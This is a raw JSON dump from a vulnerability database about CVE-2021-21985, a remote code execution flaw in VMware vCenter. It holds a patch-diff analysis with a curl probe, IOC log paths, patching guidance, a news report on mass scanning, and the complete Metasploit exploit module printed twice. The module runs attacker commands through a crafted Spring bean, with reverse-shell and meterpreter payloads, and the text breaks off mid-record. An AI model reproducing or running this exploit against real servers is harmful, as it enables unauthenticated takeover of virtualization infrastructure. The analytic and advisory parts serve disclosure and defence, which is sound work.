<param-value>/WEB-INF/spring/empy-context.xml</param-value>\n </init-param>\n\n <!-- The application context needs to be OSGI-enabled in order to look up services -->\n@@ -40,4 +55,14 @@\n <url-pattern>/*</url-pattern>\n </filter-mapping>\n\n+ <filter>\n+ <filter-name>authenticationFilter</filter-name>\n+ <filter-class>com.vmware.vsan.client.services.AuthenticationFilter</filter-class>\n+ </filter>\n+\n+ <filter-mapping>\n+ <filter-name>authenticationFilter</filter-name>\n+ <url-pattern>/rest/*</url-pattern>\n+ </filter-mapping>\n+\n </web-app>\n```\n\n```java\npackage com.vmware.vsan.client.services;\n\nimport com.vmware.vise.usersession.UserSessionService;\nimport java.io.IOException;\nimport javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.FilterConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.config.AutowireCapableBeanFactory;\nimport org.springframework.web.context.WebApplicationContext;\nimport org.springframework.web.context.support.WebApplicationContextUtils;\n\npublic class AuthenticationFilter implements Filter {\n private static final Logger logger = LoggerFactory.getLogger(AuthenticationFilter.class);\n\n @Autowired\n private UserSessionService userSessionService;\n\n public void init(FilterConfig filterConfig) {\n WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(filterConfig.getServletContext());\n AutowireCapableBeanFactory factory = context.getAutowireCapableBeanFactory();\n factory.autowireBean(this);\n }\n\n public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain) throws IOException, ServletException {\n if (this.userSessionService.getUserSession() == null) {\n HttpServletRequest httpRequest = (HttpServletRequest)request;\n HttpServletResponse httpResponse = (HttpServletResponse)response;\n logger.warn(String.format(\"Null session detected for a %s request to %s\", new Object[] { httpRequest.getMethod(), httpRequest.getRequestURL() }));\n httpResponse.setStatus(401);\n return;\n }\n filterChain.doFilter(request, response);\n }\n\n public void destroy() {}\n}\n```\n\nFurthermore, additional input validation was added to the `com.vmware.vsan.client.services.ProxygenController` class:\n\n```java\n--- a/unpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n+++ b/patched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n@@ -1,151 +1,152 @@\n package com.vmware.vsan.client.services;\n\n import com.google.common.collect.ImmutableMap;\n import com.google.gson.Gson;\n+import com.vmware.proxygen.ts.TsService;\n import com.vmware.vim.binding.vmodl.LocalizableMessage;\n import com.vmware.vim.binding.vmodl.MethodFault;\n import com.vmware.vim.binding.vmodl.RuntimeFault;\n import com.vmware.vsphere.client.vsan.util.MessageBundle;\n import java.lang.reflect.InvocationTargetException;\n import java.lang.reflect.Method;\n import java.util.HashMap;\n import java.util.List;\n import java.util.Map;\n import org.apache.commons.lang.StringUtils;\n import org.slf4j.Logger;\n import org.slf4j.LoggerFactory;\n import org.springframework.beans.BeansException;\n import org.springframework.beans.factory.BeanFactory;\n import org.springframework.beans.factory.annotation.Autowired;\n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.PathVariable;\n import org.springframework.web.bind.annotation.RequestBody;\n import org.springframework.web.bind.annotation.RequestMapping;\n import org.springframework.web.bind.annotation.RequestMethod;\n import org.springframework.web.bind.annotation.RequestParam;\n import org.springframework.web.bind.annotation.ResponseBody;\n import org.springframework.web.multipart.MultipartFile;\n\n @Controller\n @RequestMapping({\"/proxy\"})\n public class ProxygenController extends RestControllerBase {\n private static final Logger logger = LoggerFactory.getLogger(ProxygenController.class);\n\n @Autowired\n private BeanFactory beanFactory;\n\n @Autowired\n private MessageBundle messages;\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"application/json\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithJson(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestBody Map<String, Object> body) throws Exception {\n List<Object> rawData = null;\n try {\n rawData = (List<Object>)body.get(\"methodInput\");\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, null, rawData);\n }\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"multipart/form-data\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithMultipartFormData(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestParam(\"file\") MultipartFile[] files, @RequestParam(\"methodInput\") String rawData) throws Exception {\n List<Object> data = null;\n try {\n Gson gson = new Gson();\n data = (List<Object>)gson.fromJson(rawData, List.class);\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, files, data);\n }\n\n private Object invokeService(String beanIdOrClassName, String methodName, MultipartFile[] files, List<Object> data) throws Exception {\n try {\n Object bean = null;\n String beanName = null;\n Class<?> beanClass = null;\n try {\n beanClass = Class.forName(beanIdOrClassName);\n beanName = StringUtils.uncapitalize(beanClass.getSimpleName());\n } catch (ClassNotFoundException classNotFoundException) {\n beanName = beanIdOrClassName;\n }\n try {\n bean = this.beanFactory.getBean(beanName);\n } catch (BeansException beansException) {\n bean = this.beanFactory.getBean(beanClass);\n }\n byte b;\n int i;\n Method[] arrayOfMethod;\n for (i = (arrayOfMethod = bean.getClass().getMethods()).length, b = 0; b < i; ) {\n Method method = arrayOfMethod[b];\n- if (!method.getName().equals(methodName)) {\n+ if (!method.getName().equals(methodName) || !method.isAnnotationPresent((Class)TsService.class)) {\n b++;\n continue;\n }\n ProxygenSerializer serializer = new ProxygenSerializer();\n Object[] methodInput = serializer.deserializeMethodInput(data, files, method);\n Object result = method.invoke(bean, methodInput);\n Map<String, Object> map = new HashMap<>();\n map.put(\"result\", serializer.serialize(result));\n return map;\n }\n } catch (Exception e) {\n logger.error(\"service method failed to invoke\", e);\n return handleException(e);\n }\n logger.error(\"service method not found: \" + methodName + \" @ \" + beanIdOrClassName);\n return handleException(null);\n }\n\n private Object handleException(Throwable t) {\n if (t instanceof InvocationTargetException)\n return handleException(((InvocationTargetException)t).getTargetException());\n if (t instanceof java.util.concurrent.ExecutionException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vise.data.query.DataException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vim.vmomi.client.common.UnexpectedStatusCodeException)\n return ImmutableMap.of(\"error\", this.messages.string(\"util.dataservice.notRespondingFault\"));\n if (t instanceof VsanUiLocalizableException) {\n VsanUiLocalizableException localizableException = (VsanUiLocalizableException)t;\n return ImmutableMap.of(\"error\", this.messages.string(\n localizableException.getErrorKey(), localizableException.getParams()));\n }\n LocalizableMessage[] faultMessage = null;\n String vmodlMessage = null;\n if (t instanceof MethodFault) {\n faultMessage = ((MethodFault)t).getFaultMessage();\n vmodlMessage = ((MethodFault)t).getMessage();\n } else if (t instanceof RuntimeFault) {\n faultMessage = ((RuntimeFault)t).getFaultMessage();\n vmodlMessage = ((RuntimeFault)t).getMessage();\n }\n if (faultMessage != null) {\n byte b;\n int i;\n LocalizableMessage[] arrayOfLocalizableMessage;\n for (i = (arrayOfLocalizableMessage = faultMessage).length, b = 0; b < i; ) {\n LocalizableMessage localizable = arrayOfLocalizableMessage[b];\n if (localizable.getMessage() != null && !localizable.getMessage().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getMessage()));\n if (localizable.getKey() != null && !localizable.getKey().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getKey()));\n b++;\n }\n }\n if (StringUtils.isNotBlank(vmodlMessage))\n return ImmutableMap.of(\"error\", vmodlMessage);\n return ImmutableMap.of(\"error\", this.messages.string(\"vsan.common.generic.error\"));\n }\n\n private String localizeFault(String key) {\n return key;\n }\n }\n```\n\nWhich appears to be vulnerable to Java [unsafe reflection](https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection):\n\n```\nunpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\nseverity:warning rule:java.lang.security.audit.unsafe-reflection.unsafe-reflection: If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke,\nthe potential exists for the attacker to create control flow paths through the application\nthat were not intended by the application developers.\nThis attack vector may allow the attacker to bypass authentication or access control checks\nor otherwise cause the application to behave in an unexpected manner.\n\n73: beanClass = Class.forName(beanIdOrClassName);\n```\n\n### PoC\n\nThe affected endpoint is `/ui/h5-vsan/rest/proxy/service`, which responds to `POST` request:\n\n```shell\nwvu@kharak:~$ curl -kv https://[redacted]/ui/h5-vsan/rest/proxy/service/CLASS/METHOD -H \"Content-Type: application/json\" -d {}\n* Trying [redacted]...\n* TCP_NODELAY set\n* Connected to [redacted] ([redacted]) port 443 (#0)\n* ALPN, offering h2\n* ALPN, offering http/1.1\n* successfully set certificate verify locations:\n* CAfile: /etc/ssl/cert.pem\n CApath: none\n* TLSv1.2 (OUT), TLS handshake, Client hello (1):\n* TLSv1.2 (IN), TLS handshake, Server hello (2):\n* TLSv1.2 (IN), TLS handshake, Certificate (11):\n* TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n* TLSv1.2 (IN), TLS handshake, Server finished (14):\n* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (OUT), TLS handshake, Finished (20):\n* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (IN), TLS handshake, Finished (20):\n* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n* ALPN, server did not agree to a protocol\n* Server certificate:\n* subject: CN=[redacted]; C=US\n* start date: Apr 20 21:05:53 2020 GMT\n* expire date: Apr 15 21:05:51 2030 GMT\n* issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=vcenter-6-7; OU=VMware Engineering\n* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n> POST /ui/h5-vsan/rest/proxy/service/CLASS/METHOD HTTP/1.1\n> Host: [redacted]\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Type: application/json\n> Content-Length: 2\n>\n* upload completely sent off: 2 out of 2 bytes\n< HTTP/1.1 200\n< Set-Cookie: JSESSIONID=AF396E0FF5219A869AD53ABF34B7B0AF; Path=/ui/h5-vsan; HttpOnly\n< Content-Type: application/json;charset=UTF-8\n< Transfer-Encoding: chunked\n< Date: Thu, 27 May 2021 17:32:13 GMT\n< Server: Anonymous\n<\n* Connection #0 to host [redacted] left intact\n{\"error\":\"CLASS cannot be found by com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main in KernelBundleClassLoader: [bundle=com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main]\"}* Closing connection 0\nwvu@kharak:~$\n```\n\nNote that this PoC **does not** achieve RCE on its own.\n\n### IOCs\n\n> The default log location for Virtual SAN health check plugin is `/var/log/vmware/vsan-health`. And user can change it by modifying the configuration item \u201c`logdir`\u201d in the configuration file under `/usr/lib/vmware-vpx/vsan-health`. On the vCenter Server for Windows, the file is located in `%VMWARE_LOG_DIR%\\vsan-health`. **No security related information is logged in the log file.**\n\nhttps://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/products/products/vsan/vmw-gdl-vsan-health-check.pdf\n\n> The vCenter Server logs are placed in a different directory on disk depending on vCenter Server version and the deployed platform:\n>\n> - vCenter Server 6.x and higher versions on Windows server: `C:\\ProgramData\\VMware\\vCenterServer\\Logs\\`\n> - vCenter Server Appliance 6.x: `/var/log/vmware/`\n> - vCenter Server Appliance 6.x flash: `/var/log/vmware/vsphere-client`\n> - vCenter Server Appliance 6.x HTML5: `/var/log/vmware/vsphere-ui`\n\nhttps://kb.vmware.com/s/article/1021804\n\n> This article provides steps to increase the size and number of the `hostd`, `vpxa`, and `vpxd` logs so that additional data is saved. This data may be useful for troubleshooting purposes.\n\nhttps://kb.vmware.com/s/article/1004795\n\n## Guidance\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](https://kb.vmware.com/s/article/83829). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\n## References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n- https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html\n- https://core.vmware.com/resource/vmsa-2021-0010-faq", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "seebug", "title": "VMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-21985\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T00:00:00", "id": "SSV:99260", "href": "https://www.seebug.org/vuldb/ssvid-99260", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-20T01:16:20", "description": "This Metasploit module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. Tested against VMware vCenter Server 6.7 Update 3m (Linux appliance", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T00:00:00", "type": "zdt", "title": "VMware vCenter Server Virtual SAN Health Check Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2021", "CVE-2021-21985"], "modified": "2021-07-16T00:00:00", "id": "1337DAY-ID-36564", "href": "https://0day.today/exploit/description/36564", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',\n 'Description' => %q{\n This module exploits Java unsafe reflection and SSRF in the VMware\n vCenter Server Virtual SAN Health Check plugin's ProxygenController\n class to execute code as the vsphere-ui user.\n\n See the vendor advisory for affected and patched versions. Tested\n against VMware vCenter Server 6.7 Update 3m (Linux appliance).\n },\n 'Author' => [\n 'Ricter Z', # Discovery and PoC used\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21985'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],\n ['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],\n ['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],\n # Other great writeups!\n ['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],\n ['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],\n ['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],\n ['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']\n ],\n 'DisclosureDate' => '2021-05-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => ['user.name', nil]\n }.to_json\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('System property user.name is vsphere-ui.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(cmd)\n\n url = OfflineBundle.new(cmd).to_url\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => [\n [\"https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}\"],\n false # lazyInit\n ]\n }.to_json\n )\n\n fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200\n end\n\n class OfflineBundle\n attr_accessor :cmd\n\n def initialize(cmd)\n @cmd = cmd\n end\n\n def to_xml\n bean = Rex::Text.rand_text_alpha_lower(8..16)\n prop = Rex::Text.rand_text_alpha_lower(8..16)\n\n # https://www.tutorialspoint.com/spring/spring_bean_definition.htm\n <<~XML\n <beans>\n <bean id=\"#{bean}\" class=\"java.lang.ProcessBuilder\">\n <constructor-arg>\n <list>\n <value>/bin/bash</value>\n <value>-c</value>\n <value><![CDATA[#{cmd}]]></value>\n </list>\n </constructor-arg>\n <property name=\"#{prop}\" value=\"\\#{#{bean}.start()}\"/>\n </bean>\n </beans>\n XML\n end\n\n def to_zip\n Msf::Util::EXE.to_zip([\n fname: 'offline_bundle.xml',\n data: to_xml.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ])\n end\n\n def to_url\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs\n \"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}\"\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36564", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-07-13T15:55:44", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Virtual SAN Health Check Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-2021", "CVE-2021-21985"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163487", "href": "https://packetstormsecurity.com/files/163487/VMware-vCenter-Server-Virtual-SAN-Health-Check-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE', \n'Description' => %q{ \nThis module exploits Java unsafe reflection and SSRF in the VMware \nvCenter Server Virtual SAN Health Check plugin's ProxygenController \nclass to execute code as the vsphere-ui user. \n \nSee the vendor advisory for affected and patched versions. Tested \nagainst VMware vCenter Server 6.7 Update 3m (Linux appliance). \n}, \n'Author' => [ \n'Ricter Z', # Discovery and PoC used \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21985'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'], \n['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'], \n['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'], \n# Other great writeups! \n['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'], \n['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'], \n['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'], \n['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC'] \n], \n'DisclosureDate' => '2021-05-25', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], # TODO: Windows? \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky \n'SideEffects' => [ \nIOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \n# https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri( \ntarget_uri.path, \n'/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty' \n), \n'ctype' => 'application/json', \n'data' => { \n'methodInput' => ['user.name', nil] \n}.to_json \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui' \nreturn CheckCode::Safe \nend \n \nCheckCode::Vulnerable('System property user.name is vsphere-ui.') \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(cmd) \n \nurl = OfflineBundle.new(cmd).to_url \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri( \ntarget_uri.path, \n'/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages' \n), \n'ctype' => 'application/json', \n'data' => { \n'methodInput' => [ \n[\"https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}\"], \nfalse # lazyInit \n] \n}.to_json \n) \n \nfail_with(Failure::PayloadFailed, cmd) unless res&.code == 200 \nend \n \nclass OfflineBundle \nattr_accessor :cmd \n \ndef initialize(cmd) \n@cmd = cmd \nend \n \ndef to_xml \nbean = Rex::Text.rand_text_alpha_lower(8..16) \nprop = Rex::Text.rand_text_alpha_lower(8..16) \n \n# https://www.tutorialspoint.com/spring/spring_bean_definition.htm \n<<~XML \n<beans> \n<bean id=\"#{bean}\" class=\"java.lang.ProcessBuilder\"> \n<constructor-arg> \n<list> \n<value>/bin/bash</value> \n<value>-c</value> \n<value><![CDATA[#{cmd}]]></value> \n</list> \n</constructor-arg> \n<property name=\"#{prop}\" value=\"\\#{#{bean}.start()}\"/> \n</bean> \n</beans> \nXML \nend \n \ndef to_zip \nMsf::Util::EXE.to_zip([ \nfname: 'offline_bundle.xml', \ndata: to_xml.gsub(/^\\s+/, '').tr(\"\\n\", '') \n]) \nend \n \ndef to_url \n# https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs \n\"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}\" \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163487/vmware_vcenter_vsan_health_rce.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-dg9ULZEsvBw/YLtYdH9lzzI/AAAAAAAACwY/7b0FWkEi2AgXUuJHgibePqXxv9PEVVCsgCLcBGAsYHQ/s0/VMware-vSphere.jpg>)\n\nMalicious actors are actively mass scanning the internet for vulnerable VMware vCenter servers that are unpatched against a critical remote code execution flaw, which the company addressed late last month.\n\nThe ongoing activity was detected by Bad Packets on June 3 and corroborated [yesterday](<https://twitter.com/GossiTheDog/status/1397315303978250242/photo/2>) by security researcher Kevin Beaumont. \"Mass scanning activity detected from 104.40.252.159 checking for VMware vSphere hosts vulnerable to remote code execution,\" [tweeted](<https://twitter.com/bad_packets/status/1400519385194766336>) Troy Mursch, chief research officer at Bad Packets.\n\nThe development follows the publication of a [proof-of-concept](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) (PoC) RCE exploit code targeting the VMware vCenter bug.\n\nTracked as [CVE-2021-21985](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) (CVSS score 9.8), the issue is a consequence of a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which could be abused by an attacker to execute commands with unrestricted privileges on the underlying operating system that hosts the vCenter Server.\n\n[](<https://thehackernews.com/images/-2asxg2RGcVA/YLtXChb2ejI/AAAAAAAACwQ/ZlUYBOtRqGk1olUdewgacDkLMEk-xHXBwCLcBGAsYHQ/s0/poc.jpg>)\n\nAlthough the flaw was rectified by VMware on May 25, the company [strongly urged](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) its customers to apply the emergency change immediately. \"In this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,\" VMware said.\n\n[](<https://thehackernews.com/images/-gksBmuc98pQ/YLtWoqAxynI/AAAAAAAACwI/Xo8VvglhuhAdPffdp8I8DtnckVZbSzIKwCLcBGAsYHQ/s0/shodan.jpg>)\n\nThis is not the first time adversaries have opportunistically mass scanned the internet for vulnerable VMware vCenter servers. A similar remote code execution vulnerability ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by VMware in February became the [target of cyber threat actors](<https://twitter.com/bad_packets/status/1364661586070102016>) attempting to exploit and take control of unpatched systems.\n\nAt least [14,858 vCenter servers](<https://twitter.com/bad_packets/status/1364672466707128320>) were found reachable over the internet at the time, according to Bad Packets and Binary Edge.\n\nWhat's more, a new research from Cisco Talos earlier this week found that the threat actor behind the Python-based [Necro](<https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html>) bot wormed its way into exposed VMware vCenter servers by abusing the same security weakness to boost the malware's infection propagation capabilities.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 